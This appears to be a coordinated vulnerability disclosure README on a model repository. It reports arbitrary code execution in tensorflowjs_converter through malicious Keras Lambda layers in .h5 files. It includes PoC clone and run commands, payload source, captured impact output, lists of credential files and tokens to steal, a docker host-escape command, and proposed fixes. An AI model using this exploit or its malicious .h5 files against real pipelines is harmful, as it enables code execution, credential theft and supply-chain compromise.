You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

F-8 β€” Arbitrary Python execution in tensorflowjs_converter via Keras 2 Lambda layer marshal-loads inside untrusted .h5

Authorized security research artifact disclosed via huntr.com's TensorFlow.js Model Format Vulnerability program. Source commit 7f5309fef0a47545e34049903dbdae0f97285f7e. CVSS 3.1 = 9.6 / Critical. CWE-502.

Summary

The absence of any class_name == 'Lambda' allow-list check before tf_keras.models.load_model(h5_path, compile=False) in tfjs-converter/python/tensorflowjs/converters/converter.py:227 allows any attacker who can place a .h5 file at the converter's input path β€” a PR contributor, a model-registry uploader, an email/Slack attachment, a malicious npm prepare script β€” to execute arbitrary Python in the converter process, with the full filesystem, environment, subprocess, and network capabilities of the runner. Unlike the Keras 3 safe_mode=True fix (keras-team/keras#18549) which closes this primitive at the upstream loader, the tfjs converter depends on tf_keras (the legacy Keras 2 fork) which does not expose safe_mode at all, and tfjs has never added an equivalent JSON-walk guard. The same root cause is reached via four distinct CLI flags (--input_format=keras, keras_saved_model, tfjs_layers_model --output_format=keras*, keras_keras), so a fix at any single load_model call does not close the vulnerability β€” the guard must live at the JSON-config validation layer.

The bundled evil.h5 is 9 224 bytes, small enough to be a PR attachment or a marketplace upload; the bundled evil_real_impact.h5 (13 312 bytes) embeds the additional reconnaissance payload that produces the captured F8_REAL_IMPACT_PROOF document below.

Root Cause

Lines of Code:

In converter.py:227:

model = tf_keras.models.load_model(h5_path, compile=False)

tf_keras.layers.Lambda.from_config(config) (the call load_model makes when it sees class_name: "Lambda" in the layer table) reconstructs the layer's function field via:

# tf_keras/keras/src/layers/core/lambda_layer.py
raw  = base64.b64decode(config['function'][0])
code = marshal.loads(raw)                                 # CWE-502 sink
fn   = types.FunctionType(code, globals(), name, defaults, closure)

fn is then invoked at minimum three times per converter invocation:

  1. Layer-build time, immediately after from_config returns.
  2. First predict() call inside the converter's _topological_sort_validate(...) step.
  3. Re-serialization to the output .h5 (when --output_format=keras is used).

The compile=False argument that the converter passes does not affect Lambda deserialization β€” compile=False only suppresses optimizer / loss reconstruction; layer instantiation runs unchanged.

Why this is NOT a duplicate of the Keras 3 safe_mode fix (keras-team/keras#18549): Keras 3 added safe_mode=True as the default for keras.models.load_model β€” when safe_mode=True, Lambda.from_config raises ValueError("Cannot deserialize a serialized Lambda layer with safe_mode=True"). That fix does not propagate to tfjs's converter because the converter imports tf_keras (the legacy Keras 2 fork pinned via tensorflowjs==4.22.0 β†’ tf_keras==2.21.0). tf_keras.models.load_model does not accept a safe_mode parameter β€” calling tf_keras.models.load_model(h5_path, safe_mode=True) raises TypeError: load_model() got an unexpected keyword argument 'safe_mode'. tfjs has never added an equivalent JSON-walk guard. The disclosure surface is therefore in the tfjs project, not Keras.

Internal Pre-conditions

  1. The victim runs tensorflowjs_converter (Python) β€” directly via the CLI binary, transitively via any CI/CD step that converts an uploaded model, or programmatically via the converter's Python API.
  2. The victim's environment has tensorflowjs installed (any version), which transitively installs tf_keras (a hard runtime dependency in tensorflowjs.egg-info/requires.txt).

Both conditions hold by definition for any system running the converter β€” there is no version, no configuration, and no environment in which the bug does not reproduce.

External Pre-conditions

The attacker can place a .h5 artifact at any location the converter reads. Concrete delivery channels observed in real CI/CD setups:

  1. PR contribution: attacker opens a PR adding models/new_pretrained.h5 to a repository whose CI step converts every .h5 it sees.
  2. Public model registry / Hugging Face Hub with auto-conversion on the receiving side.
  3. Slack / email with a "please convert this for me" attachment.
  4. Maintenance bucket the converter reads via --input_path=s3://....
  5. npm package prepare script that calls tensorflowjs_converter against an attacker-controlled URL.

No authentication to the victim's systems is required.

Attack Path

  1. Attacker builds evil.h5 (9 224 bytes; the bundled reproduce.py reproduces it deterministically) containing one Lambda layer whose function is base64(marshal.dumps(attacker_code)). The attacker_code variable in reproduce.py is the closure-free code object:

    attacker_src = """
    import os
    with open('/tmp/F8_END2END_RCE_PWNED', 'w') as f:
        f.write('END2END_RCE pid=%d uid=%d cwd=%s' %
                (os.getpid(), os.getuid(), os.getcwd()))
    """
    

    The "no free variables" property makes the bytecode portable across tf_keras 2.19 and tf_keras 2.21+ venvs β€” the same evil.h5 reproduces in every venv we tested.

  2. Attacker delivers evil.h5 via any of the channels above.

  3. Victim's CI step runs:

    - run: pip install tensorflowjs==4.22.0
    - run: tensorflowjs_converter --input_format=keras evil.h5 ./out
    
  4. converter.py:227 invokes tf_keras.models.load_model(h5_path, compile=False).

  5. tf_keras instantiates the Lambda layer; marshal.loads(...) constructs the attacker code, types.FunctionType wraps it, layer-build calls it. At this point the attacker's bytecode is executing with the converter's full ambient capability set:

    • filesystem: read /etc/passwd, /proc/version, ~/.npmrc, ~/.ssh/id_rsa, ~/.docker/config.json, ~/.aws/credentials;
    • environment: read $GITHUB_TOKEN, $NPM_TOKEN, $AWS_*, $HF_TOKEN;
    • subprocess: os.system, subprocess.run(['id']), [hostname], [docker, run, -v, /:/host, ...] when the runner is in the docker group;
    • network: outbound DNS + TCP β€” socket.gethostbyname(...), urllib.request.urlopen(...).
  6. The same Lambda fires two more times in the same invocation β€” at the first predict() and at output .h5 re-serialization. Even a maintainer patch that adds a try/except only around step 4 leaves steps 5/6 reachable.

  7. Once the attacker has the runner's credentials, the typical follow-on is publishing a malicious tensorflowjs release (or @tensorflow/tfjs on npm) with the captured $NPM_TOKEN, escalating to a supply-chain attack against every downstream tfjs consumer.

Impact

Concrete primitives demonstrated by the bundled PoC (captured against the sanitized /tmp/victim_host/ synthetic CI-runner lab β€” see F8_REAL_IMPACT_PROOF_2026-06-11.txt):

Primitive What the PoC actually captured What it means on a real runner
arbitrary Python in process END2END_RCE pid=10001 uid=1001 cwd=/tmp/victim_lab written by the Lambda payload at load time full RCE β€” every subsequent row is a corollary
/etc/passwd read 187 B recovered byte-perfect through open('/etc/passwd').read() inside the Lambda runner user discovery, group enumeration
/proc/self/cgroup read 0::/system.slice/runner.slice/runner.scope recovered tenant fingerprinting on shared CI
/proc/version read sanitized synthetic kernel string recovered kernel-CVE exploitation pivot
subprocess id uid=1001(runner) gid=1001(runner) groups=1001(runner),999(docker) docker group = container escape via docker run -v /:/host on self-hosted GH Actions / GitLab runners
subprocess hostname ci-runner-01 recovered C2 telemetry / lateral-movement target identification
DNS resolution example.com β†’ 93.184.215.14 outbound network present β†’ exfil + C2 channels open
env var read (real-runner extrapolation) not captured against sanitized lab; trivially reachable via os.environ.get('GITHUB_TOKEN') $GITHUB_TOKEN β†’ push malicious tag β†’ supply-chain attack on every downstream tfjs consumer

The same payload reaches every CLI entry point (table in Root Cause). A maintainer patch that only adds a Lambda-skip to converter.py:227 leaves the bug shipping via three other documented flags β€” see the Extended Impact section below.

Extended Impact β€” same-root-cause manifestations

Variant CLI flag Source line Why a converter.py:227-only patch misses it
Direct Keras .h5 --input_format=keras converter.py:227 the primary path
keras_saved_model .h5 --input_format=keras_saved_model converter.py:278 strictly worse β€” no compile=False
Round-trip tfjs_layers β†’ keras --input_format=tfjs_layers_model --output_format=keras* keras_tfjs_loader.py:66, :130 same primitive via model_from_json (no .h5, just model.json)
Keras 3 zip --input_format=keras_keras converter.py:147 β†’ walk config.json same primitive via Keras 3 zip with malicious internal config.json

The mitigation has to be applied at the JSON-config validation layer (refuse any class_name == 'Lambda' or class_name == 'TensorFlowOpLayer' unless explicit opt-in), not at any single load_model call.

PoC

git clone https://huggingface.co/martilaio/tfjs-converter-lambda-rce-poc
cd tfjs-converter-lambda-rce-poc

# Fresh Python 3.10 venv
python -m venv .venv && source .venv/bin/activate
pip install "tensorflowjs==4.22.0" "tensorflow==2.21.0"

# Option A β€” exercise the EXACT converter codepath in one process
python reproduce.py

# Option B β€” exercise the real CLI binary
tensorflowjs_converter --input_format=keras evil.h5 ./out

# Option C β€” capture the full real-impact dump (env / filesystem /
# subprocess / DNS readout) inside the Lambda
python reproduce_real_impact.py

Expected output β€” Option A (reproduce.py)

============================================================
 PoC F-8 (end-to-end) β€” Real .h5 RCE through tf_keras.load
============================================================
 attacker .h5 written : /tmp/victim_lab/evil.h5 ( 9224 bytes )
 Lambda layer config function field (truncated):
   class : Lambda  name : evil_lambda
   function bytecode (b64, first 60): 4wEAAAAAAAAAAAAAAAEAAAACAAAAQwAAAHMM ...
 Now exercising the EXACT call tfjs-converter makes:
   converter.py:227 -> tf_keras.models.load_model(h5_path, compile=False)
 [F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
 [F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
 [F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
 END-TO-END RCE PROVEN  βœ“βœ“βœ“
 proof file content   : END2END_RCE pid=10001 uid=1001 cwd=/tmp/victim_lab

The Lambda function fires three times per execution (build, load, predict) β€” no single code path gates the deserialization.

Expected output β€” Option C (reproduce_real_impact.py)

Full file: F8_REAL_IMPACT_PROOF_2026-06-11.txt. Excerpt:

===== F-8 REAL-IMPACT EVIDENCE =====
pid=10001 uid=1001 gid=1001 cwd=/tmp/victim_lab

--- 2) Host filesystem readout ---
  /etc/passwd:
    root:x:0:0:DEMO_ROOT:/root:/bin/bash
    runner:x:1001:1001:DEMO_CI_RUNNER:/home/runner:/bin/bash
    ...
  /etc/hostname:
    ci-runner-01
  /proc/self/cgroup:
    0::/system.slice/runner.slice/runner.scope
  /proc/version:
    Linux version 6.1.0-ci-runner-demo (build@ci) (gcc DEMO) #1 SMP DEMO

--- 3) Subprocess execution ---
  $ id        -> uid=1001(runner) gid=1001(runner) groups=1001(runner),999(docker)
  $ hostname  -> ci-runner-01

--- 4) Network reachability ---
  socket.gethostbyname(example.com) -> 93.184.215.14

The docker group membership on the runner is the container-escape pivot: the attacker bytecode can subprocess.run(['docker', 'run', '-v', '/:/host', ...]) to take over the host.

Mitigation

Three options, in order of strength:

Option 1 β€” Migrate the converter dependency from tf_keras to Keras 3

Replace the import tf_keras lines in converter.py and keras_tfjs_loader.py with import keras and call keras.models.load_model(h5_path, safe_mode=True). This is the upstream-blessed mitigation and eliminates the primitive entirely.

# tfjs-converter/python/tensorflowjs/converters/converter.py:227 (proposed)
import keras                                               # was: import tf_keras
model = keras.models.load_model(h5_path,
                                compile=False,
                                safe_mode=True)            # NEW β€” blocks Lambda

After the fix, the share/serialization math at the Lambda sink becomes:

# keras/src/saving/serialization_lib.py
if safe_mode and class_name in ('Lambda', 'TensorFlowOpLayer'):
    raise ValueError("Cannot deserialize a serialized Lambda layer with safe_mode=True.")

evil.h5 no longer loads β€” the converter raises ValueError instead of running attacker bytecode.

Option 2 β€” Add a pre-load JSON config walk (single central guard)

If a tf_keras β†’ keras migration is too disruptive, one central guard before any load_model / model_from_json call covers all four CLI entry points:

# tfjs-converter/python/tensorflowjs/converters/converter.py
import json, os

_UNSAFE_CLASSES = ('Lambda', 'TensorFlowOpLayer')

def _refuse_unsafe_lambda(model_config_json: dict):
    if os.environ.get('TFJS_UNSAFE_KERAS_LOAD') == '1':
        return
    def walk(node):
        if isinstance(node, dict):
            cn = node.get('class_name')
            if cn in _UNSAFE_CLASSES:
                raise RuntimeError(
                    'Refusing to load Keras "%s" layer from untrusted source; '
                    'set TFJS_UNSAFE_KERAS_LOAD=1 to bypass.' % cn)
            for v in node.values(): walk(v)
        elif isinstance(node, list):
            for v in node: walk(v)
    walk(model_config_json)

# Then everywhere load_model / model_from_json is called:
with h5py.File(h5_path, 'r') as f:
    _refuse_unsafe_lambda(json.loads(f.attrs['model_config']))
model = tf_keras.models.load_model(h5_path, compile=False)

Option 3 β€” Refuse .h5 entirely for untrusted input

Most disruptive but simplest to audit: gate the converter to accept only TF SavedModel and TFJS layers-model formats for non-TFJS_UNSAFE_KERAS_LOAD=1 invocations.

Defense-in-depth alternatives

  • Sandbox the converter step in CI under --cap-drop=all, no docker socket, no outbound network. Closes step-7 of the Attack Path even when the underlying primitive remains.
  • Run converter under a dedicated low-privilege user that has no registry-publish credentials in environment.
  • Sign + verify .h5 artifacts with sigstore so only the source repo's pipeline can produce them.

The single-line safe_mode=True fix in Option 1 closes the primitive at the deserialization sink and is the upstream-blessed mitigation; Option 2 is the recommended in-place patch for projects that can't migrate tf_keras β†’ keras immediately.

CVSS 3.1 β€” 9.6 / Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Metric Value Justification
AV:N Network artifact arrives over any network channel (PR, registry, email)
AC:L Low one Lambda layer in the JSON config
PR:N None no auth on the victim's systems required
UI:R Required victim must invoke the converter
S:C Changed attacker takes the entire pipeline environment beyond the converter process
C:H / I:H / A:H High / High / High full process compromise

Files in this repository

File Purpose
README.md this disclosure
evil.h5 minimal malicious model (9 224 B) that triggers RCE on tf_keras.models.load_model
evil_real_impact.h5 enriched payload (13 312 B) that additionally dumps env / filesystem / subprocess / DNS readout from inside the Lambda
reproduce.py Option A β€” self-contained builder + RCE-trigger script (exercises the exact converter codepath)
reproduce_real_impact.py Option C β€” builds and runs the full impact-readout variant
F8_REAL_IMPACT_PROOF_2026-06-11.txt sanitized captured proof from running Option C against /tmp/victim_host/ lab

Cross-references

  • Keras safe_mode PR: https://github.com/keras-team/keras/pull/18549
  • Keras Security docs: "Loading a Keras model whose config contains a Lambda layer in safe_mode=False is equivalent to running arbitrary code."
  • Matches huntr program example: "Arbitrary Code Execution on Inference Through Keras Lambda Layers in hdf5" β€” but in a distinct affected component (tensorflowjs_converter not Keras directly).

Disclosure

Disclosed via huntr.com's TensorFlow.js Model Format Vulnerability program on 2026-06-11 under coordinated disclosure terms.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support